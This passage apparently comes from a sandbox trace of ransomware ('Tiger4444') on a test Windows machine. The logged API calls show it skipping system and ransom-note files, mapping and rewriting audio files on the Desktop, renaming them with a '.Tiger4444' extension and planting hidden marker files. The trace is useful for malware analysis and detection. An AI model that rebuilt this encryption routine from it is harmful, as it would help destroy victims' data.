lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="bootmgr") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="pagefile.sys") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="boot") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="ids.txt") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="NTUSER.DAT") returned 1 [0049.611] lstrcpyW (in: lpString1=0x30aead8, lpString2="Wa4HKe.mp3" | out: lpString1="Wa4HKe.mp3") returned="Wa4HKe.mp3" [0049.611] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Wa4HKe.mp3", dwFileAttributes=0x0) returned 1 [0049.611] lstrlenW (lpString="Wa4HKe.mp3") returned 10 [0049.611] lstrlenW (lpString="Tiger4444") returned 9 [0049.611] lstrcmpiW (lpString1="a4HKe.mp3", lpString2="Tiger4444") returned -1 [0049.611] lstrlenW (lpString=".dll") returned 4 [0049.611] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.611] lstrlenW (lpString=".lnk") returned 4 [0049.611] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.611] lstrlenW (lpString=".ini") returned 4 [0049.611] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.612] lstrlenW (lpString=".sys") returned 4 [0049.612] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.612] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Wa4HKe.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wa4hke.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.612] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.612] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14106637522) returned 1 [0049.613] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=89535) returned 1 [0049.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0049.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0049.613] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x160c0, lpName=0x0) returned 0x2c8 [0049.614] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160c0) returned 0xbe0000 [0049.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.616] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14106907790) returned 1 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0049.616] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0049.616] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.617] CloseHandle (hObject=0x2c8) returned 1 [0049.617] CloseHandle (hObject=0x260) returned 1 [0049.617] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\Wa4HKe.mp3.Tiger4444") returned 44 [0049.617] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Wa4HKe.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wa4hke.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Wa4HKe.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\wa4hke.mp3.tiger4444"), dwFlags=0x1) returned 1 [0049.618] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b93880, ftCreationTime.dwHighDateTime=0x1d4d12d, ftLastAccessTime.dwLowDateTime=0x1ad19bb0, ftLastAccessTime.dwHighDateTime=0x1d4d33c, ftLastWriteTime.dwLowDateTime=0x1ad19bb0, ftLastWriteTime.dwHighDateTime=0x1d4d33c, nFileSizeHigh=0x0, nFileSizeLow=0x17416, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zH1qLFL_L5_F0_C1KIZ.wav", cAlternateFileName="ZH1QLF~1.WAV")) returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="Tiger4444.exe") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2=".") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="..") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="windows") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="bootmgr") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="pagefile.sys") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="boot") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="ids.txt") returned 1 [0049.618] lstrcmpiW (lpString1="zH1qLFL_L5_F0_C1KIZ.wav", lpString2="NTUSER.DAT") returned 1 [0049.618] lstrcpyW (in: lpString1=0x30aead8, lpString2="zH1qLFL_L5_F0_C1KIZ.wav" | out: lpString1="zH1qLFL_L5_F0_C1KIZ.wav") returned="zH1qLFL_L5_F0_C1KIZ.wav" [0049.618] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zH1qLFL_L5_F0_C1KIZ.wav", dwFileAttributes=0x0) returned 1 [0049.618] lstrlenW (lpString="zH1qLFL_L5_F0_C1KIZ.wav") returned 23 [0049.618] lstrlenW (lpString="Tiger4444") returned 9 [0049.618] lstrcmpiW (lpString1="C1KIZ.wav", lpString2="Tiger4444") returned -1 [0049.618] lstrlenW (lpString=".dll") returned 4 [0049.618] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.618] lstrlenW (lpString=".lnk") returned 4 [0049.618] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.618] lstrlenW (lpString=".ini") returned 4 [0049.618] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.618] lstrlenW (lpString=".sys") returned 4 [0049.618] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zH1qLFL_L5_F0_C1KIZ.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\zh1qlfl_l5_f0_c1kiz.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.619] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.619] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14107178596) returned 1 [0049.619] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=95254) returned 1 [0049.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0049.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0049.619] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17720, lpName=0x0) returned 0x2c8 [0049.619] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17720) returned 0xbe0000 [0049.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.622] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14107501536) returned 1 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0049.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0049.622] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.623] CloseHandle (hObject=0x2c8) returned 1 [0049.623] CloseHandle (hObject=0x260) returned 1 [0049.623] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\zH1qLFL_L5_F0_C1KIZ.wav.Tiger4444") returned 57 [0049.623] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\zH1qLFL_L5_F0_C1KIZ.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\zh1qlfl_l5_f0_c1kiz.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\zH1qLFL_L5_F0_C1KIZ.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\zh1qlfl_l5_f0_c1kiz.wav.tiger4444"), dwFlags=0x1) returned 1 [0049.624] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda99b550, ftCreationTime.dwHighDateTime=0x1d4cd19, ftLastAccessTime.dwLowDateTime=0xa61047e0, ftLastAccessTime.dwHighDateTime=0x1d4c80a, ftLastWriteTime.dwLowDateTime=0xa61047e0, ftLastWriteTime.dwHighDateTime=0x1d4c80a, nFileSizeHigh=0x0, nFileSizeLow=0x41ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_IWaP7-XwLltWjdEE.m4a", cAlternateFileName="_IWAP7~1.M4A")) returned 1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="Tiger4444.exe") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2=".") returned 1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="..") returned 1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="windows") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="bootmgr") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="pagefile.sys") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="boot") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="ids.txt") returned -1 [0049.624] lstrcmpiW (lpString1="_IWaP7-XwLltWjdEE.m4a", lpString2="NTUSER.DAT") returned -1 [0049.624] lstrcpyW (in: lpString1=0x30aead8, lpString2="_IWaP7-XwLltWjdEE.m4a" | out: lpString1="_IWaP7-XwLltWjdEE.m4a") returned="_IWaP7-XwLltWjdEE.m4a" [0049.624] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_IWaP7-XwLltWjdEE.m4a", dwFileAttributes=0x0) returned 1 [0049.624] lstrlenW (lpString="_IWaP7-XwLltWjdEE.m4a") returned 21 [0049.624] lstrlenW (lpString="Tiger4444") returned 9 [0049.624] lstrcmpiW (lpString1="WjdEE.m4a", lpString2="Tiger4444") returned 1 [0049.624] lstrlenW (lpString=".dll") returned 4 [0049.624] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.624] lstrlenW (lpString=".lnk") returned 4 [0049.624] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.624] lstrlenW (lpString=".ini") returned 4 [0049.624] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.624] lstrlenW (lpString=".sys") returned 4 [0049.625] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_IWaP7-XwLltWjdEE.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\_iwap7-xwlltwjdee.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.625] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.625] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14107778907) returned 1 [0049.625] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=16813) returned 1 [0049.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0049.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0049.625] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44b0, lpName=0x0) returned 0x2c8 [0049.625] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44b0) returned 0xbe0000 [0049.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.626] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14107899293) returned 1 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0049.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0049.626] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.626] CloseHandle (hObject=0x2c8) returned 1 [0049.626] CloseHandle (hObject=0x260) returned 1 [0049.627] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\_IWaP7-XwLltWjdEE.m4a.Tiger4444") returned 55 [0049.627] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\_IWaP7-XwLltWjdEE.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\_iwap7-xwlltwjdee.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\_IWaP7-XwLltWjdEE.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\_iwap7-xwlltwjdee.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.627] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda99b550, ftCreationTime.dwHighDateTime=0x1d4cd19, ftLastAccessTime.dwLowDateTime=0xa61047e0, ftLastAccessTime.dwHighDateTime=0x1d4c80a, ftLastWriteTime.dwLowDateTime=0xa61047e0, ftLastWriteTime.dwHighDateTime=0x1d4c80a, nFileSizeHigh=0x0, nFileSizeLow=0x41ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_IWaP7-XwLltWjdEE.m4a", cAlternateFileName="_IWAP7~1.M4A")) returned 0 [0049.627] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0049.627] lstrcpyW (in: lpString1=0x30aead8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0049.628] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0049.628] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0049.628] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.628] CloseHandle (hObject=0x260) returned 1 [0049.629] CloseHandle (hObject=0x2ac) returned 1 [0049.629] GetCurrentThreadId () returned 0xfa8 [0049.629] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0049.629] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Desktop\\cFnKWi", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi") returned="C:\\Users\\FD1HVy\\Desktop\\cFnKWi" [0049.629] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc821d8 | out: hHeap=0xc50000) returned 1 [0049.629] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0049.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Desktop\\cFnKWi" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi") returned="C:\\Users\\FD1HVy\\Desktop\\cFnKWi" [0049.629] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\") returned="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\" [0049.629] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\.BFC0E91B00AE8A0620D3" [0049.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0049.629] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0049.631] FlushFileBuffers (hFile=0x2ac) returned 1 [0049.632] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.632] CloseHandle (hObject=0x2ac) returned 1 [0049.633] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\cFnKWi") returned 30 [0049.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.633] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd831bd70, ftCreationTime.dwHighDateTime=0x1d4cec3, ftLastAccessTime.dwLowDateTime=0x723bd490, ftLastAccessTime.dwHighDateTime=0x1d4d18b, ftLastWriteTime.dwLowDateTime=0x82997593, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0049.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.633] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.633] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0049.633] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.633] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd831bd70, ftCreationTime.dwHighDateTime=0x1d4cec3, ftLastAccessTime.dwLowDateTime=0x723bd490, ftLastAccessTime.dwHighDateTime=0x1d4d18b, ftLastWriteTime.dwLowDateTime=0x82997593, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.633] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.633] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.633] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0049.633] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.633] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.633] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82997593, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82997593, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82997593, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.633] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.633] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.633] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7acbd70, ftCreationTime.dwHighDateTime=0x1d4cd61, ftLastAccessTime.dwLowDateTime=0x9ffbc2d0, ftLastAccessTime.dwHighDateTime=0x1d4d043, ftLastWriteTime.dwLowDateTime=0x9ffbc2d0, ftLastWriteTime.dwHighDateTime=0x1d4d043, nFileSizeHigh=0x0, nFileSizeLow=0x6c62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4GlM138d-HV-Uq.m4a", cAlternateFileName="4GLM13~1.M4A")) returned 1 [0049.633] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.633] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.633] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="Tiger4444.exe") returned -1 [0049.633] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2=".") returned 1 [0049.633] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="..") returned 1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="windows") returned -1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="bootmgr") returned -1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="pagefile.sys") returned -1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="boot") returned -1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="ids.txt") returned -1 [0049.634] lstrcmpiW (lpString1="4GlM138d-HV-Uq.m4a", lpString2="NTUSER.DAT") returned -1 [0049.634] lstrcpyW (in: lpString1=0x30aeae6, lpString2="4GlM138d-HV-Uq.m4a" | out: lpString1="4GlM138d-HV-Uq.m4a") returned="4GlM138d-HV-Uq.m4a" [0049.634] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4GlM138d-HV-Uq.m4a", dwFileAttributes=0x0) returned 1 [0049.634] lstrlenW (lpString="4GlM138d-HV-Uq.m4a") returned 18 [0049.634] lstrlenW (lpString="Tiger4444") returned 9 [0049.634] lstrcmpiW (lpString1="HV-Uq.m4a", lpString2="Tiger4444") returned -1 [0049.634] lstrlenW (lpString=".dll") returned 4 [0049.634] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.634] lstrlenW (lpString=".lnk") returned 4 [0049.634] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.634] lstrlenW (lpString=".ini") returned 4 [0049.634] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.634] lstrlenW (lpString=".sys") returned 4 [0049.634] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\4GlM138d-HV-Uq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\4glm138d-hv-uq.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 